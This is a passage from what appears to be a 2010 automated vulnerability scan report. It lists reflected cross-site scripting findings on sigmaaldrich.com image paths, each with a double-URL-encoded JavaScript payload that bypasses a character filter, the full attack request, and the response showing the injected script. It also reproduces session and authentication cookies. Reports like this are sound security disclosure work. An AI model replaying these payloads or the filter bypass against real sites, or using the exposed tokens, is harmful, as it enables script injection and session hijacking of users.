Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:42 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalogea66d";alert(1)//0e85a483f8f/chromatogram-icon","E404") ;
   </script>
...[SNIP]...

1.461. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icon

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db2%2522%253balert%25281%2529%252f%252f9bb269c26d5 was submitted in the REST URL parameter 6. This input was echoed as d1db2";alert(1)//9bb269c26d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icond1db2%2522%253balert%25281%2529%252f%252f9bb269c26d5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalog/chromatogram-icond1db2";alert(1)//9bb269c26d5","E404") ;
   </script>
...[SNIP]...

1.462. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6820d%2522%253balert%25281%2529%252f%252f6a954d68043 was submitted in the REST URL parameter 1. This input was echoed as 6820d";alert(1)//6a954d68043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc6820d%2522%253balert%25281%2529%252f%252f6a954d68043/medialib/sigma-aldrich/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc6820d";alert(1)//6a954d68043/medialib/sigma-aldrich/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.463. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25756%2522%253balert%25281%2529%252f%252facc5422b7 was submitted in the REST URL parameter 2. This input was echoed as 25756";alert(1)//acc5422b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib25756%2522%253balert%25281%2529%252f%252facc5422b7/sigma-aldrich/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib25756";alert(1)//acc5422b7/sigma-aldrich/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.464. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5110d%2522%253balert%25281%2529%252f%252fd756c1744f1 was submitted in the REST URL parameter 3. This input was echoed as 5110d";alert(1)//d756c1744f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich5110d%2522%253balert%25281%2529%252f%252fd756c1744f1/images/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich5110d";alert(1)//d756c1744f1/images/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.465. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ad3%2522%253balert%25281%2529%252f%252f6747eed535d was submitted in the REST URL parameter 4. This input was echoed as 28ad3";alert(1)//6747eed535d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images28ad3%2522%253balert%25281%2529%252f%252f6747eed535d/online-catalog/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
